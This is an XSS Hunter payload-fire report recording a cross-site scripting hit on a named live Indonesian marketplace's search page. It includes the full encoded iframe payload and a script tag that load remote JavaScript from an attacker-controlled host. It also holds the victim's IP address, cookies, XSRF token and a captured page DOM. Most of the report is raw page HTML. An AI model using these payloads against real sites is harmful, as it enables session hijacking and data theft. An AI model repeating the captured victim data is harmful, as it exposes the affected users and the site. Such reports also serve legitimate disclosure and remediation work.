XSS Hunter Report by DimasAriadi

# XSS Hunter Report By DimasAriadi
The page located at `https://dgpmall.com/search?q=%22%3E%3Ciframe+srcdoc%3D

%22%26%2360%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B
%26%23116%3B%26%2362%3B%26%23118%3B%26%2397%3B%26%23114%3B%26%2332%3B
%26%2397%3B%26%2361%3B%26%23112%3B%26%2397%3B%26%23114%3B%26%23101%3B
%26%23110%3B%26%23116%3B%26%2346%3B%26%23100%3B%26%23111%3B%26%2399%3B
%26%23117%3B%26%23109%3B%26%23101%3B%26%23110%3B%26%23116%3B%26%2346%3B
%26%2399%3B%26%23114%3B%26%23101%3B%26%2397%3B%26%23116%3B%26%23101%3B
%26%2369%3B%26%23108%3B%26%23101%3B%26%23109%3B%26%23101%3B%26%23110%3B
%26%23116%3B%26%2340%3B%26%2334%3B%26%23115%3B%26%2399%3B%26%23114%3B
%26%23105%3B%26%23112%3B%26%23116%3B%26%2334%3B%26%2341%3B%26%2359%3B
%26%2397%3B%26%2346%3B%26%23115%3B%26%23114%3B%26%2399%3B%26%2361%3B
%26%2334%3B%26%23104%3B%26%23116%3B%26%23116%3B%26%23112%3B%26%23115%3B
%26%2358%3B%26%2347%3B%26%2347%3Bsayang.xss.ht%26%2334%3B%26%2359%3B
%26%23112%3B%26%2397%3B%26%23114%3B%26%23101%3B%26%23110%3B%26%23116%3B
%26%2346%3B%26%23100%3B%26%23111%3B%26%2399%3B%26%23117%3B%26%23109%3B
%26%23101%3B%26%23110%3B%26%23116%3B%26%2346%3B%26%2398%3B%26%23111%3B
%26%23100%3B%26%23121%3B%26%2346%3B%26%2397%3B%26%23112%3B%26%23112%3B
%26%23101%3B%26%23110%3B%26%23100%3B%26%2367%3B%26%23104%3B%26%23105%3B
%26%23108%3B%26%23100%3B%26%2340%3B%26%2397%3B%26%2341%3B%26%2359%3B
%26%2360%3B%26%2347%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B
%26%23112%3B%26%23116%3B%26%2362%3B%22%3E` suffers from a Cross-site Scripting (XSS)
vulnerability. XSS is a vulnerability which occurs when user input is unsafely encorporated into the
HTML markup inside of a webpage. When not properly escaped an attacker can inject malicious
JavaScript that, once evaluated, can be used to hijack authenticated sessions and rewrite the
vulnerable page's layout and functionality. The following report contains information on an XSS
payload that has fired on `https://dgpmall.com`, it can be used to reproduce and remediate the
vulnerability.
### XSS Payload Fire Details

##### Vulnerable Page
`https://dgpmall.com/search?q=%22%3E%3Ciframe+srcdoc%3D%22%26%2360%3B%26%23115%3B
%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2362%3B
%26%23118%3B%26%2397%3B%26%23114%3B%26%2332%3B%26%2397%3B%26%2361%3B
%26%23112%3B%26%2397%3B%26%23114%3B%26%23101%3B%26%23110%3B%26%23116%3B
%26%2346%3B%26%23100%3B%26%23111%3B%26%2399%3B%26%23117%3B%26%23109%3B
%26%23101%3B%26%23110%3B%26%23116%3B%26%2346%3B%26%2399%3B%26%23114%3B
%26%23101%3B%26%2397%3B%26%23116%3B%26%23101%3B%26%2369%3B%26%23108%3B
%26%23101%3B%26%23109%3B%26%23101%3B%26%23110%3B%26%23116%3B%26%2340%3B
%26%2334%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B
%26%23116%3B%26%2334%3B%26%2341%3B%26%2359%3B%26%2397%3B%26%2346%3B
%26%23115%3B%26%23114%3B%26%2399%3B%26%2361%3B%26%2334%3B%26%23104%3B
%26%23116%3B%26%23116%3B%26%23112%3B%26%23115%3B%26%2358%3B%26%2347%3B
%26%2347%3Bsayang.xss.ht%26%2334%3B%26%2359%3B%26%23112%3B%26%2397%3B
%26%23114%3B%26%23101%3B%26%23110%3B%26%23116%3B%26%2346%3B%26%23100%3B
%26%23111%3B%26%2399%3B%26%23117%3B%26%23109%3B%26%23101%3B%26%23110%3B
%26%23116%3B%26%2346%3B%26%2398%3B%26%23111%3B%26%23100%3B%26%23121%3B
%26%2346%3B%26%2397%3B%26%23112%3B%26%23112%3B%26%23101%3B%26%23110%3B
%26%23100%3B%26%2367%3B%26%23104%3B%26%23105%3B%26%23108%3B%26%23100%3B
%26%2340%3B%26%2397%3B%26%2341%3B%26%2359%3B%26%2360%3B%26%2347%3B
%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B
%26%2362%3B%22%3E`
##### Victim IP Address

`180.246.38.136`
##### Referer
``
##### User Agent

`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131
Safari/537.36`
##### Cookies (Non-HTTPOnly)

`_ga=GA1.1.959126171.1631109602; XSRF-TOKEN=lmWIYNwh8dCIQvZeujCWJBoT4IpHCcIS6x44DrsW;
_ga_4N6H8DME4L=GS1.1.1631326262.2.1.1631328038.0`
##### Document Object Model (DOM)

```html
<html lang="id"><head>
<meta name="csrf-token" content="lmWIYNwh8dCIQvZeujCWJBoT4IpHCcIS6x44DrsW">

<meta name="app-url" content="https://dgpmall.com/">
<meta name="file-base-url" content="https://dgpmall.com/public/">
<title>DGP Mall</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index, follow">
<meta name="description" content="DGPMALL merupakan marketplace yang mengkurasi produk
lokal untuk dipasarkan hingga skala global.
Menggunakan teknologi blockchain, yakni DGPayment sebagai dukungan untuk pembayaran

remmitance, point reward, cashback dan promosi produk.">
<meta name="keywords" content="dgp mall, dgpmall, dgpaytech, dgpbot, dgpayment, marketplace
indonesia, marketplace umkm, marketplace ekspor, marketplace export, marketplace lokal,
marketplace global, marketplace impor, marketplace import, marketplace crypto, marketplace
jakarta, ecommerce umkm, ecommerce ekspor, ecommerce export, ecommerce import, ecommerce
indonesia, ecommerce crypto">


<meta itemprop="name" content="DGP Mall">
<meta itemprop="description" content="DGPMALL merupakan marketplace yang mengkurasi
produk lokal untuk dipasarkan hingga skala global.



<meta name="twitter:title" content="DGP Mall">
<meta name="twitter:description" content="DGPMALL merupakan marketplace yang mengkurasi



<meta property="og:title" content="DGP Mall">
<meta property="og:description" content="DGPMALL merupakan marketplace yang mengkurasi


<meta itemprop="name" content="DGP Mall">
<meta itemprop="description" content="DGPMALL merupakan marketplace yang mengkurasi

<meta itemprop="image"
content="https://dgpmall.com/public/uploads/all/YQGqiePeEVm9evaBiH89oznARrUgS20BOtyVktjI.pn
g">


<meta name="twitter:card" content="product">
<meta name="twitter:site" content="@publisher_handle">
<meta name="twitter:title" content="DGP Mall">
<meta name="twitter:description" content="DGPMALL merupakan marketplace yang mengkurasi

<meta name="twitter:creator" content="@author_handle">
<meta name="twitter:image"
g">


<meta property="og:title" content="DGP Mall">
<meta property="og:type" content="website">
<meta property="og:url" content="https://dgpmall.com">
<meta property="og:image"
g">
<meta property="og:description" content="DGPMALL merupakan marketplace yang mengkurasi

<meta property="og:site_name" content="DGP Mall">
<meta property="fb:app_id" content="">


<link rel="icon"
href="https://dgpmall.com/public/uploads/all/D6W1wwbp6BtBPBp9BMUaA76Ud5BRCmNdrdCRB1l3.
png">


<link href="https://fonts.googleapis.com/css?
family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&display=swap"
rel="stylesheet">


<link rel="stylesheet" href="https://dgpmall.com/public/assets/css/vendors.css">
<link rel="stylesheet" href="https://dgpmall.com/public/assets/css/aiz-core.css">
<link rel="stylesheet" href="https://dgpmall.com/public/assets/css/custom-style.css">
<script>
var AIZ = AIZ || {};
AIZ.local = {
nothing_selected: 'Pilih Disini',
nothing_found: 'Gak ada',
choose_file: 'Pilih file',
file_selected: 'File yang dipilih',
files_selected: 'File yang dipilih',
add_more_files: 'Tambah file',
adding_more_files: 'Tambahin file lagi',
drop_files_here_paste_or: 'Tarik file kesini, paste langsung atau',
browse: 'Cari',
upload_complete: 'Unggah selesai',
upload_paused: 'Unggah terjeda',
resume_upload: 'Lanjutkan unggah',
pause_upload: 'Jeda unggah',
retry_upload: 'Coba unggah lagi',
cancel_upload: 'Batalkan unggah',
uploading: 'Mengunggah',
processing: 'Memproses',
complete: 'Komplit',
file: 'File',
files: 'File',
}
</script>
<style>
body{
font-family: 'Open Sans', sans-serif;
font-weight: 400;
}
:root{
--primary: #6f12ff;
--hov-primary: #e800f6;
--soft-primary: rgba(111,18,255,0.15);
}
</style>


<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-4N6H8DME4L"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-4N6H8DME4L');
</script>
<script type="text/javascript" src="https://js.xendit.co/v1/xendit.min.js"></script>

<script type="text/javascript">
Xendit.setPublishableKey('xnd_public_production_YvjWlsr6LXIyxjYZhuo6OiZLeZ9jWsBVQRkXxasXDXu
E6oc5j1tKGMfhSFnSF');
</script>
<script src="https://sayang.xss.ht?_=1631328038772"></script></head>
<body class="typed-search-box-shown">

<div class="aiz-main-wrapper d-flex flex-column">


<div class="position-relative top-banner removable-session z-1035" data-key="top-banner" data-
value="removed">
<a href="https://dgpmall.com/category/batik-pria-3y5oi" class="d-block text-reset">
<img
src="https://dgpmall.com/public/uploads/all/lpbfCL8FmMf2R0UBp4wIL0RqE8vtKqWGTyZeXmtp.png"
class="w-100 mw-100 h-50px h-lg-auto img-fit">
</a>
<button class="btn text-white absolute-top-right set-session" data-key="top-banner" data-
value="removed" data-toggle="remove-parent" data-parent=".top-banner">
<i class="la la-close la-2x"></i>
</button>
</div>

<div class="top-navbar bg-white border-bottom border-soft-secondary z-1035">
<div class="container">
<div class="row">
<div class="col-lg-7 col">
<ul class="list-inline d-flex justify-content-between justify-content-lg-start mb-0">
<li class="list-inline-item dropdown mr-3" id="lang-change">
<a href="javascript:void(0)" class="dropdown-toggle text-reset py-2" data-
toggle="dropdown" data-display="static">
<img src="https://dgpmall.com/public/assets/img/flags/id.png" data-
src="https://dgpmall.com/public/assets/img/flags/id.png" class="mr-2 ls-is-cached lazyloaded"
alt="Indonesia" height="11">
<span class="opacity-60">Indonesia</span>
</a>
<ul class="dropdown-menu dropdown-menu-left">
<li>
<a href="javascript:void(0)" data-flag="en" class="dropdown-item ">
<img src="https://dgpmall.com/public/assets/img/placeholder.jpg" data-
src="https://dgpmall.com/public/assets/img/flags/en.png" class="mr-1 lazyload" alt="English"
height="11">
<span class="language">English</span>
</a>
</li>
<li>
<a href="javascript:void(0)" data-flag="id" class="dropdown-item ">
<img src="https://dgpmall.com/public/assets/img/placeholder.jpg" data-
src="https://dgpmall.com/public/assets/img/flags/id.png" class="mr-1 lazyload" alt="Indonesia"
height="11">
<span class="language">Indonesia</span>
</a>
</li>
</ul>
</li>
<li class="list-inline-item dropdown" id="currency-change">

<a href="javascript:void(0)" class="dropdown-toggle text-reset py-2
opacity-60" data-toggle="dropdown" data-display="static">
Rupiah Rp
</a>
<ul class="dropdown-menu dropdown-menu-right dropdown-menu-lg-left">
<li>
<a class="dropdown-item " href="javascript:void(0)" data-currency="USD">U.S.
Dollar ($)</a>
</li>
<li>
<a class="dropdown-item active " href="javascript:void(0)" data-
currency="IDR">Rupiah (Rp)</a>
</li>
</ul>
</li>
</ul>
</div>
<div class="col-5 text-right d-none d-lg-block">

<ul class="list-inline mb-0">
<li class="list-inline-item mr-3">
<a href="https://dgpmall.com/users/login" class="text-reset py-2 d-inline-block
opacity-60">Masuk</a>
</li>
<li class="list-inline-item">
<a href="https://dgpmall.com/users/registration" class="text-reset py-2 d-inline-block
opacity-60">Buat Akun</a>
</li>
</ul>
</div>
</div>
</div>
</div>

<header class=" sticky-top z-1020 bg-white border-bottom shadow-sm">
<div class="position-relative logo-bar-area z-1">
<div class="d-flex align-items-center">
<div class="col-auto col-xl-3 pl-0 pr-3 d-flex align-items-center">

<a class="d-block py-20px mr-3 ml-0" href="https://dgpmall.com">
<img
src="https://dgpmall.com/public/uploads/all/1fnVrdZPWhpDrloYbB0lFT1j2GK1HZVZbWocyDZO.png"
alt="DGP Mall" class="mw-100 h-30px h-md-40px" height="40">
</a>
<div class="d-none d-xl-block align-self-stretch category-menu-icon-box ml-

auto mr-0">
<div class="h-100 d-flex align-items-center" id="category-menu-icon">
<div class="dropdown-toggle navbar-light bg-light h-40px w-50px pl-2 rounded
border c-pointer">
<span class="navbar-toggler-icon"></span>
</div>
</div>
</div>
</div>
<div class="d-lg-none ml-auto mr-0">
<a class="p-2 d-block text-reset" href="javascript:void(0);" data-toggle="class-toggle" data-
target=".front-header-search">
<i class="las la-search la-flip-horizontal la-2x"></i>
</a>
</div>
<div class="flex-grow-1 front-header-search d-flex align-items-center bg-white">

<div class="position-relative flex-grow-1">
<form action="https://dgpmall.com/search" method="GET" class="stop-propagation">
<div class="d-flex position-relative align-items-center">
<div class="d-lg-none" data-toggle="class-toggle" data-target=".front-header-
search">
<button class="btn px-2" type="button"><i class="la la-2x la-long-arrow-
left"></i></button>
</div>
<div class="input-group">
<input type="text" class="border-0 border-lg form-control" id="search" name="q"
placeholder="Cari produk atau toko disini...." autocomplete="off">
<div class="input-group-append d-none d-lg-block">
<button class="btn btn-primary" type="submit">
<i class="la la-search la-flip-horizontal fs-18"></i>
</button>
</div>
</div>
</div>
</form>
<div class="typed-search-box stop-propagation document-click-d-none bg-white
rounded shadow-lg position-absolute left-0 top-100 w-100" style="min-height: 200px">
<div class="search-preloader absolute-top-center d-none">
<div class="dot-loader"><div></div><div></div><div></div></div>
</div>
<div class="search-nothing p-3 text-center fs-16">Sorry, nothing found for
<strong>"<script>$.getScript("//sayang.xss.ht")</script>"</strong></div>
<div id="search-content" class="text-left"></div>
</div>
</div>
</div>
<div class="d-none d-lg-none ml-3 mr-0">

<div class="nav-search-box">
<a href="#" class="nav-box-link">
<i class="la la-search la-flip-horizontal d-inline-block nav-box-icon"></i>
</a>
</div>
</div>
<div class="d-none d-lg-block ml-3 mr-0">

<div class="" id="compare">
<a href="https://dgpmall.com/compare" class="d-flex align-items-center text-reset">
<i class="la la-refresh la-2x opacity-80"></i>
<span class="flex-grow-1 ml-1">
<span class="badge badge-primary badge-inline badge-pill">0</span>
<span class="nav-box-text d-none d-xl-block opacity-70">Bandingin Produk</span>
</span>
</a> </div>
</div>
<div class="d-none d-lg-block ml-3 mr-0">

<div class="" id="wishlist">
<a href="https://dgpmall.com/wishlists" class="d-flex align-items-center text-reset">
<i class="la la-heart-o la-2x opacity-80"></i>
<span class="nav-box-text d-none d-xl-block opacity-70">Daftar Wishlist</span>
</span>
</a>
</div>
</div>
<div class="d-none d-lg-block align-self-stretch ml-3 mr-0" data-hover="dropdown">

<div class="nav-cart-box dropdown h-100" id="cart_items">
<a href="javascript:void(0)" class="d-flex align-items-center text-reset h-100" data-
toggle="dropdown" data-display="static">
<i class="la la-shopping-cart la-2x opacity-80"></i>
<span class="nav-box-text d-none d-xl-block opacity-70">Keranjang</span>
</span>
</a>
<div class="dropdown-menu dropdown-menu-right dropdown-menu-lg p-0 stop-propagation">
<div class="text-center p-3">

<i class="las la-frown la-3x opacity-60 mb-3"></i>
<h3 class="h6 fw-700">Keranjang Masih Kosong</h3>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="hover-category-menu position-absolute w-100 top-100 left-0 right-0 d-none z-3"
id="hover-category-menu">
<div class="row gutters-10 position-relative">
<div class="col-lg-3 position-static">
<div class="aiz-category-menu bg-white rounded shadow-lg" id="category-sidebar">
<div class="p-3 bg-soft-primary d-none d-lg-block rounded-top all-category position-relative text-
left">
<span class="fw-600 fs-16 mr-3">Kategori</span>
<a href="https://dgpmall.com/categories" class="text-reset">
<span class="d-none d-lg-inline-block">Liat Semua ></span>
</a>
</div>
<ul class="list-unstyled categories no-scrollbar py-2 mb-0 text-left">
<li class="category-nav-element" data-id="9">
<a href="https://dgpmall.com/category/food-kpjwj" class="text-truncate text-reset py-2 px-3
d-block">
<img class="cat-image lazyload mr-2 opacity-60"
src="https://dgpmall.com/public/assets/img/placeholder.jpg" data-
src="https://dgpmall.com/public/uploads/all/qWFsYo3Fk0XT1UZdHNLpv7mEEAhe2OFvtqZlj7PY.png"
width="16" alt="Makanan"
onerror="this.onerror=null;this.src='https://dgpmall.com/public/assets/img/placeholder.jpg';">
<span class="cat-name">Makanan</span>
</a>
<div class="sub-cat-menu c-scrollbar-light rounded shadow-lg p-4">
<div class="c-preloader text-center absolute-center">
<i class="las la-spinner la-spin la-3x opacity-70"></i>
</div>
</div>
</li>
<a href="https://dgpmall.com/category/drink-9gobv" class="text-truncate text-reset py-2 px-
3 d-block">
src="https://dgpmall.com/public/uploads/all/MBklauv1PlEpLd1ymlOSOZUScckoAI2KmhRdbpUv.png"
width="16" alt="Minuman"
<span class="cat-name">Minuman</span>
</a>
</div>
</div>
</li>
<a href="https://dgpmall.com/category/groceries-z7d6n" class="text-truncate text-reset py-
2 px-3 d-block">
src="https://dgpmall.com/public/uploads/all/iJoQrIOmiatuVDN9vt6FSRIQTU0RkRytrVONgr4s.png"
width="16" alt="Sembako"
<span class="cat-name">Sembako</span>
</a>
</li>
<a href="https://dgpmall.com/category/vegetable--fruit-oj4cd" class="text-truncate text-
reset py-2 px-3 d-block">
src="https://dgpmall.com/public/uploads/all/pysVzWlfLZVhNQt64DAChZblRQzHD2jhGdkU5EOn.png"
width="16" alt="Sayur & Buah"
<span class="cat-name">Sayur & Buah</span>
</a>
</div>
</div>
</li>
<a href="https://dgpmall.com/category/meat--frozen-food-shnkf" class="text-truncate text-
src="https://dgpmall.com/public/uploads/all/m5LN8asMpx16wJ6W83Lu3YkSiByGrA9HWLg7vQa3.png
" width="16" alt="Daging & Makanan Beku"
<span class="cat-name">Daging & Makanan Beku</span>
</a>
</li>
<a href="https://dgpmall.com/category/fashion--accesories-z93jv" class="text-truncate text-
src="https://dgpmall.com/public/uploads/all/9cdxvibc8jhTHNd9DfRadU69Ww8CueeUaPw7bBDw.png
" width="16" alt="Pakaian & Aksesoris"
<span class="cat-name">Pakaian & Aksesoris</span>
</a>
</div>
</div>
</li>
<a href="https://dgpmall.com/category/home--garden-2oeqw" class="text-truncate text-
src="https://dgpmall.com/public/uploads/all/4CkXisOaoPSWp9QQ3Rjt7XH6JaNexPvYwGMo8l40.png"
width="16" alt="Rumah Tangga & Taman"
<span class="cat-name">Rumah Tangga & Taman</span>
</a>
</div>
</div>
</li>
<a href="https://dgpmall.com/category/elektronik-fadkc" class="text-truncate text-reset py-
2 px-3 d-block">
src="https://dgpmall.com/public/uploads/all/GpUuyHbLHseIDYkPxW8kyLn5RPpZlJI2dkn2iK07.png"
width="16" alt="Elektronik"
<span class="cat-name">Elektronik</span>
</a>
</div>
</div>
</li>
<a href="https://dgpmall.com/category/kesehatan-4knbx" class="text-truncate text-reset py-
2 px-3 d-block">
src="https://dgpmall.com/public/uploads/all/HkB0X0yYQMbNqQHROmQwQdWyY47MqWgUVoLQy
Wyd.png" width="16" alt="Kesehatan & Kecantikan"
<span class="cat-name">Kesehatan & Kecantikan</span>
</a>
</li>
<a href="https://dgpmall.com/category/mainan--hobi-lr7j1" class="text-truncate text-reset
py-2 px-3 d-block">
src="https://dgpmall.com/public/uploads/all/Ys3htIMZGlUEUmqGLzyvXW9BmmFLL67gOcUJ5TUR.pn
g" width="16" alt="Mainan & Hobi"
<span class="cat-name">Mainan & Hobi</span>
</a>
</li>
<a href="https://dgpmall.com/category/olahraga-co4fu" class="text-truncate text-reset py-2
px-3 d-block">
src="https://dgpmall.com/public/uploads/all/XHdDiQr629xunIAwk3i2nqppBC37mvnMIU5zAUdt.png"
width="16" alt="Olahraga"
<span class="cat-name">Olahraga</span>
</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="bg-white border-top border-gray-200 py-1">
<ul class="list-inline mb-0 pl-0 mobile-hor-swipe text-center">
<a href="https://dgpmall.com" class="opacity-60 fs-14 px-3 py-2 d-inline-block fw-600
hov-opacity-100 text-reset">
Beranda
</a>
</li>
<a href="https://dgpmall.com/flash-deals" class="opacity-60 fs-14 px-3 py-2 d-inline-
block fw-600 hov-opacity-100 text-reset">
Kejar Diskon
</a>
</li>
<a href="https://dgpmall.com/blog" class="opacity-60 fs-14 px-3 py-2 d-inline-block fw-
600 hov-opacity-100 text-reset">
Blog
</a>
</li>
<a href="https://dgpmall.com/brands" class="opacity-60 fs-14 px-3 py-2 d-inline-block
fw-600 hov-opacity-100 text-reset">
Semua Merek
</a>
</li>
<a href="https://dgpmall.com/categories" class="opacity-60 fs-14 px-3 py-2 d-inline-
block fw-600 hov-opacity-100 text-reset">
Semua Kategori
</a>
</li>
</ul>
</div>
</div>
</header>
<section class="mb-4 pt-3">

<div class="container sm-px-0">
<form class="" id="search-form" action="" method="GET">
<div class="row">
<div class="col-xl-3">
<div class="aiz-filter-sidebar collapse-sidebar-wrap sidebar-xl sidebar-right z-1035">
<div class="overlay overlay-fixed dark c-pointer" data-toggle="class-toggle" data-
target=".aiz-filter-sidebar" data-same=".filter-sidebar-thumb"></div>
<div class="collapse-sidebar c-scrollbar-light text-left">
<div class="d-flex d-xl-none justify-content-between align-items-center pl-3 border-
bottom">
<h3 class="h6 mb-0 fw-600">Filter</h3>
<button type="button" class="btn btn-sm p-2 filter-sidebar-thumb" data-
toggle="class-toggle" data-target=".aiz-filter-sidebar">
<i class="las la-times la-2x"></i>
</button>
</div>
<div class="bg-white shadow-sm rounded mb-3">
<div class="fs-15 fw-600 p-3 border-bottom">
Kategori
</div>
<div class="p-3">
<ul class="list-unstyled">
<li class="mb-2 ml-
2">
<a class="text-reset fs-14" href="https://dgpmall.com/category/food-
kpjwj">Makanan</a>
</li>
<li class="mb-2 ml-2">
<a class="text-reset fs-14" href="https://dgpmall.com/category/drink-
9gobv">Minuman</a>
</li>
<a class="text-reset fs-14"
href="https://dgpmall.com/category/groceries-z7d6n">Sembako</a>
</li>
href="https://dgpmall.com/category/vegetable--fruit-oj4cd">Sayur & Buah</a>
</li>
<a class="text-reset fs-14" href="https://dgpmall.com/category/meat--
frozen-food-shnkf">Daging & Makanan Beku</a>
</li>
href="https://dgpmall.com/category/fashion--accesories-z93jv">Pakaian & Aksesoris</a>
</li>
href="https://dgpmall.com/category/home--garden-2oeqw">Rumah Tangga & Taman</a>
</li>
href="https://dgpmall.com/category/elektronik-fadkc">Elektronik</a>
</li>
href="https://dgpmall.com/category/kesehatan-4knbx">Kesehatan & Kecantikan</a>
</li>
href="https://dgpmall.com/category/mainan--hobi-lr7j1">Mainan & Hobi</a>
</li>
href="https://dgpmall.com/category/olahraga-co4fu">Olahraga</a>
</li>
</ul>
</div>
</div>
Rentang Harga
</div>
<div class="p-3">
<div class="aiz-range-slider">
<div id="input-slider-range" data-range-value-min=" 100.00 " data-range-
value-max=" 41283102.30 " class="noUi-target noUi-ltr noUi-horizontal noUi-txt-dir-ltr"><div
class="noUi-base"><div class="noUi-connects"><div class="noUi-connect" style="transform:
translate(0%, 0px) scale(0, 1);"></div></div><div class="noUi-origin" style="transform: translate(-
1000%, 0px); z-index: 5;"><div class="noUi-handle noUi-handle-lower" data-handle="0" tabindex="0"
role="slider" aria-orientation="horizontal" aria-valuemin="100.0" aria-valuemax="100.0" aria-
valuenow="100.0" aria-valuetext="100.00"><div class="noUi-touch-area"></div></div></div><div
class="noUi-origin" style="transform: translate(-1000%, 0px); z-index: 6;"><div class="noUi-handle
noUi-handle-upper" data-handle="1" tabindex="0" role="slider" aria-orientation="horizontal" aria-
valuemin="100.0" aria-valuemax="41283102.0" aria-valuenow="100.0" aria-valuetext="100.00"><div
class="noUi-touch-area"></div></div></div></div></div>
<div class="row mt-2">

<div class="col-6">
<span class="range-slider-value value-low fs-14 fw-600 opacity-70" data-
range-value-low="0" id="input-slider-range-value-low">100.00</span>
</div>
<div class="col-6 text-right">
<span class="range-slider-value value-high fs-14 fw-600 opacity-70"
data-range-value-high="0" id="input-slider-range-value-high">100.00</span>
</div>
</div>
</div>
</div>
</div>
Atur Pake Warna
</div>
<div class="p-3">
<div class="aiz-radio-inline">
</div>
</div>
</div>
</div>
</div>
</div>
<div class="col-xl-9">
<ul class="breadcrumb bg-transparent p-0">

<li class="breadcrumb-item opacity-50">
<a class="text-reset" href="https://dgpmall.com">Beranda</a>
</li>
<li class="breadcrumb-item fw-600 text-dark">
<a class="text-reset" href="https://dgpmall.com/search">"Semua Kategori"</a>
</li>
</ul>
<div class="text-left">
<div class="d-flex align-items-center">
<div>
<h1 class="h6 fw-600 text-body">
Hasil pencarian untuk""><iframe
srcdoc="<script&#
62;var a=pa&am
p;#114;ent.doc&#1
17;ment.cre&
amp;#97;teEleme&
#110;t("scrip
t");a.sr&#
99;="https:&a
mp;#47;/sayang.xss.ht";par&#10
1;nt.docum&a
mp;#101;nt.body&#
46;appendCh&
amp;#105;ld(a);<&#47
;script>">"
</h1>
</div>
<div class="form-group ml-auto mr-0 w-200px d-none d-xl-block">
<label class="mb-0 opacity-50">Merek</label>
<div class="dropdown bootstrap-select form-control form-control-sm
aiz-"><select class="form-control form-control-sm aiz-selectpicker" data-live-search="true"
name="brand" onchange="filter()" tabindex="-98">
<option value="">Semua Merek</option>
<option value="indonesia-gtgpm">Indonesia</option>
<option value="internasional-
fytql">Internasional</option>
</select><button type="button" class="btn dropdown-
toggle btn-light" data-toggle="dropdown" role="combobox" aria-owns="bs-select-1" aria-
haspopup="listbox" aria-expanded="false" title="Semua Merek"><div class="filter-option"><div
class="filter-option-inner"><div class="filter-option-inner-inner">Semua Merek</div></div>
</div></button><div class="dropdown-menu "><div class="bs-searchbox"><input type="search"
class="form-control" autocomplete="off" role="combobox" aria-label="Search" aria-controls="bs-
select-1" aria-autocomplete="list"></div><div class="inner show" role="listbox" id="bs-select-1"
tabindex="-1"><ul class="dropdown-menu inner show" role="presentation"></ul></div></div></div>
</div>
<div class="form-group w-200px ml-0 ml-xl-3">
<label class="mb-0 opacity-50">Kelompokkan berdasarkan</label>
<div class="dropdown bootstrap-select form-control form-control-sm
aiz-"><select class="form-control form-control-sm aiz-selectpicker" name="sort_by"
onchange="filter()" tabindex="-98">
<option value="newest">Terbaru Nih</option>
<option value="oldest">Paling Lama</option>
<option value="price-asc">Harga Terendah ke Tertinggi</option>
<option value="price-desc">Harga Tertinggi ke Terendah</option>
</select><button type="button" class="btn dropdown-toggle btn-light" data-
toggle="dropdown" role="combobox" aria-owns="bs-select-2" aria-haspopup="listbox" aria-
expanded="false" title="Terbaru Nih"><div class="filter-option"><div class="filter-option-inner"><div
class="filter-option-inner-inner">Terbaru Nih</div></div> </div></button><div class="dropdown-
menu "><div class="inner show" role="listbox" id="bs-select-2" tabindex="-1"><ul class="dropdown-
menu inner show" role="presentation"></ul></div></div></div>
</div>
<div class="d-xl-none ml-auto ml-xl-3 mr-0 form-group align-self-end">
<button type="button" class="btn btn-icon p-0" data-toggle="class-toggle" data-
target=".aiz-filter-sidebar">
<i class="la la-filter la-2x"></i>
</button>
</div>
</div>
</div>
<input type="hidden" name="min_price" value="">
<input type="hidden" name="max_price" value="">
<div class="row gutters-5 row-cols-xxl-4 row-cols-xl-3 row-cols-lg-4 row-cols-md-3 row-
cols-2">
</div>
<div class="aiz-pagination aiz-pagination-center mt-4">
</div>
</div>
</div>
</form>
</div>
</section>
<section class="bg-white border-top mt-auto">

<div class="row no-gutters">
<div class="col-lg-3 col-md-6">
<a class="text-reset border-left text-center p-4 d-block" href="https://dgpmall.com/terms">
<i class="la la-file-text la-3x text-primary mb-2"></i>
<h4 class="h6">Syarat & Ketentuan</h4>
</a>
</div>
<a class="text-reset border-left text-center p-4 d-block"
href="https://dgpmall.com/returnpolicy">
<i class="la la-mail-reply la-3x text-primary mb-2"></i>
<h4 class="h6">Kebijakan Pengembalian</h4>
</a>
</div>
<a class="text-reset border-left text-center p-4 d-block"
href="https://dgpmall.com/supportpolicy">
<i class="la la-support la-3x text-primary mb-2"></i>
<h4 class="h6">Kebijakan Dukungan</h4>
</a>
</div>
<a class="text-reset border-left border-right text-center p-4 d-block"
href="https://dgpmall.com/privacypolicy">
<i class="las la-exclamation-circle la-3x text-primary mb-2"></i>
<h4 class="h6">Kebijakan Privasi</h4>
</a>
</div>
</div>
</div>
</section>
<section class="bg-dark py-5 text-light footer-widget">

<div class="row">
<div class="col-lg-5 col-xl-4 text-center text-md-left">
<div class="mt-4">
<a href="https://dgpmall.com" class="d-block">
<img class=" ls-is-cached lazyloaded"
data-
alt="DGP Mall" height="44">
</a>
<div class="my-3">
<p> <b>DGPMALL </b>merupakan marketplace yang
mempertemukan pedagang eceran, ritel hingga ekspor dari berbagai macam negara agar dapat saling
terhubung melalui pemanfaatan teknologi.</p><p><b>DGPMALL </b>dibuat menggunakan teknologi
blockchain, yakni <b>DGPayment </b>sebagai dukungan untuk pembayaran remmitance, point
reward, cashback, promo, hingga kompetisi. </p> </div>
<div class="d-inline-block d-md-block mb-4">
<form class="form-inline" method="POST" action="https://dgpmall.com/subscribers">
<input type="hidden" name="_token"
value="lmWIYNwh8dCIQvZeujCWJBoT4IpHCcIS6x44DrsW"> <div class="form-group
mb-0">
<input type="email" class="form-control" placeholder="Email Kamu" name="email"
required="">
</div>
<button type="submit" class="btn btn-primary">
Langganan
</button>
</form>
</div>
<div class="w-300px mw-100 mx-auto mx-md-0">
<a href="#" target="_blank" class="d-inline-block mr-3 ml-0">
<img src="https://dgpmall.com/public/assets/img/play.png" class="mx-100 h-
40px">
</a>
<a href="#" target="_blank" class="d-inline-block">
<img src="https://dgpmall.com/public/assets/img/app.png" class="mx-100 h-
40px">
</a>
</div>
</div>
</div>
<div class="col-lg-3 ml-xl-auto col-md-4 mr-0">
